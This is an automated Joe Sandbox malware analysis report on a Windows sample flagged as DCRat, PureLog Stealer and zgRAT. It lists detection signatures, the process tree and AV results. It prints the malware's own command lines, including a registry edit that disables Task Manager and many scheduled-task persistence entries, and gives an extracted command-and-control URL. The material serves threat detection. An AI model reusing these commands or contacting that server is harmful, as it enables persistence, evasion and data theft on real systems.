Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kJrNOFEGbQ.exe

Overview

General Information

Sample name:kJrNOFEGbQ.exe
renamed because original name is a hash value
Original sample name:36bbafbd00e62a37070764eb4ed93308.exe
Analysis ID:1583905
MD5:36bbafbd00e62a37070764eb4ed93308
SHA1:40acb7b8fec8d6d8e0d0a9310c511a35d0b34c27
SHA256:7fbf15fc103c368c639ba11695315909b1dbd9361e83cf48fb2177cc8ff060e2
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • kJrNOFEGbQ.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\kJrNOFEGbQ.exe" MD5: 36BBAFBD00E62A37070764EB4ED93308)
    • wscript.exe (PID: 7580 cmdline: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8008 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Mscommon.exe (PID: 8024 cmdline: "C:\hyperComponentFontDhcp/Mscommon.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
          • schtasks.exe (PID: 8168 cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7180 cmdline: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 7228 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7324 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 3848 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5312 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4936 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1908 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4192 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5856 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3732 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 11 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1880 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3340 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 8 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5580 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4564 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5592 cmdline: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 3864 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7304 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7452 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • ruRRsbcJNKBbiFjvLZZICNpuYz.exe (PID: 5252 cmdline: "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cmd.exe (PID: 7572 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cmd.exe (PID: 7548 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cmd.exe (PID: 7808 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cmd.exe (PID: 7200 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cmd.exe (PID: 1244 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cmd.exe (PID: 1436 cmdline: "C:\Users\All Users\SoftwareDistribution\cmd.exe" MD5: C47F34E03D2A705E84CCB97C250966F2)
  • cleanup
{"C2 url": "http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
kJrNOFEGbQ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    kJrNOFEGbQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\hyperComponentFontDhcp\Mscommon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\hyperComponentFontDhcp\Mscommon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 3 entries
                          SourceRuleDescriptionAuthorStrings
                          0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  8.0.Mscommon.exe.5c0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7228, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, ProcessId: 8184, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f, ProcessId: 8184, ProcessName: schtasks.exe
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe", EventID: 13, EventType: SetValue, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ruRRsbcJNKBbiFjvLZZICNpuYz
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\All Users\SoftwareDistribution\cmd.exe", EventID: 13, EventType: SetValue, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\All Users\SoftwareDistribution\cmd.exe", EventID: 13, EventType: SetValue, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", ProcessId: 7228, ProcessName: csc.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f, CommandLine: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f, ProcessId: 3848, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kJrNOFEGbQ.exe", ParentImage: C:\Users\user\Desktop\kJrNOFEGbQ.exe, ParentProcessId: 7536, ParentProcessName: kJrNOFEGbQ.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" , ProcessId: 7580, ProcessName: wscript.exe
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\hyperComponentFontDhcp\Mscommon.exe, ProcessId: 8024, TargetFilename: C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline

                                    Data Obfuscation

                                    barindex
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperComponentFontDhcp/Mscommon.exe", ParentImage: C:\hyperComponentFontDhcp\Mscommon.exe, ParentProcessId: 8024, ParentProcessName: Mscommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline", ProcessId: 7228, ProcessName: csc.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-03T20:47:39.900911+010020480951A Network Trojan was detected192.168.2.449736193.58.121.13780TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: kJrNOFEGbQ.exeAvira: detected
                                    Source: http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.phpAvira URL Cloud: Label: malware
                                    Source: C:\Users\user\Desktop\AEzAQzJw.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\RrReMzQm.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\QCZpVjcx.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\WGSwrSeE.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\CXEIeahW.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\RTAxOVPQ.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeReversingLabs: Detection: 82%
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeReversingLabs: Detection: 82%
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\Desktop\BjUpXdep.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\BpLaswaY.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\JmTPAbOe.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\KAZQIQEM.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\KVMxlGUc.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\LSnFHGjW.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\QCZpVjcx.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\RCtfAzVO.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\RTAxOVPQ.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\SzUnVzkJ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\TnEFcwnq.logReversingLabs: Detection: 15%
                                    Source: C:\Users\user\Desktop\XDtENRtz.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\bhUNaLwZ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\dwWdpxyo.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\gVlLDILN.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\lZeSZrOV.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\oGeTRkCA.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\sfNsKLIr.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\spksuybo.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\vwiBQQWj.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\wwCruhPB.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\zepZsevX.logReversingLabs: Detection: 29%
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeReversingLabs: Detection: 82%
                                    Source: kJrNOFEGbQ.exeReversingLabs: Detection: 73%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Source: C:\Users\user\Desktop\TnEFcwnq.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JmTPAbOe.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\PIewODkQ.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\AEzAQzJw.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\KVMxlGUc.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RrReMzQm.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\LSnFHGjW.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\WGSwrSeE.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JVsHHpbK.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\CXEIeahW.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\GTFZlGXP.logJoe Sandbox ML: detected
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeJoe Sandbox ML: detected
